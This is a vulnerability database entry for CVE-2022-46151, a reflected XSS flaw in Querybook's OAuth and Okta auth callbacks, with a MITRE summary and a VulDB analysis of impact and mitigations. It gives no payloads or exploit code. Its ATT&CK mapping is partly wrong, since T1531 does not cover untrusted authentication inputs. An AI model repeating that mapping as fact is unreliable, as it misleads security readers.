CVE-2022-46151 in Querybook
Summary
by MITRE • 12/06/2022
Querybook is an open source data querying UI. In affected versions user provided data is not escaped in the error field of the auth callback url in `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. This may allow attackers to perform reflected cross site scripting (XSS) if Content Security Policy (CSP) is not enabled or `unsafe-inline` is allowed. Users are advised to upgrade to the latest, patched version of querybook (version 3.14.2 or greater). Users unable to upgrade may enable CSP and not allow unsafe-inline or manually escape query parameters in a reverse proxy.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 12/26/2022
CVE-2022-46151 represents a reflected cross site scripting vulnerability within Querybook, an open source data querying user interface platform. This security flaw exists in the authentication callback mechanisms where user-provided data is inadequately escaped in the error field of the authentication callback URL. The vulnerability is specifically located in two authentication modules: `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. The technical implementation fails to properly sanitize input parameters that are subsequently reflected back to users in error messages, creating a pathway for malicious actors to inject arbitrary JavaScript code.
The operational impact of this vulnerability is significant as it allows attackers to execute malicious scripts in the context of authenticated users' browsers. When users encounter authentication errors during the login process, the reflected XSS payload would execute in their browser, potentially leading to session hijacking, credential theft, or unauthorized data access. The vulnerability's exploitation becomes more feasible when Content Security Policy is either not implemented or when the policy allows `unsafe-inline` script execution. This aligns with CWE-79 which categorizes cross site scripting as a result of inadequate input validation and output encoding. The attack vector follows the typical reflected XSS pattern where malicious input is embedded in a URL parameter and then reflected back by the web application to the user's browser.
The security implications extend beyond simple script execution as this vulnerability could enable attackers to establish persistent access to the Querybook platform. Attackers could craft malicious URLs that, when clicked by authenticated users, would execute scripts to steal session cookies, redirect users to malicious sites, or perform actions on behalf of the victim. The vulnerability's location within the authentication flow makes it particularly dangerous as it could be exploited during user login attempts, potentially compromising the entire authentication ecosystem. This aligns with ATT&CK technique T1566 which covers social engineering through malicious links and T1531 which involves use of untrusted inputs in authentication flows. Organizations relying on Querybook for data analysis and querying face substantial risk if this vulnerability remains unpatched, as it could lead to unauthorized access to sensitive data and potential compliance violations.
The recommended mitigation strategy involves upgrading to Querybook version 3.14.2 or higher where the vulnerability has been addressed through proper input sanitization and output encoding. For organizations unable to immediately upgrade, several defensive measures can be implemented. Enabling a robust Content Security Policy that blocks inline scripts and restricts script sources provides a strong defense against XSS exploitation. Additionally, implementing a reverse proxy with manual escaping of query parameters can serve as an effective workaround. The fix should ensure that all user-provided data in authentication error fields undergoes proper HTML entity encoding before being rendered in the browser. Security teams should also implement regular input validation and output encoding practices across all authentication modules to prevent similar vulnerabilities from emerging in the future.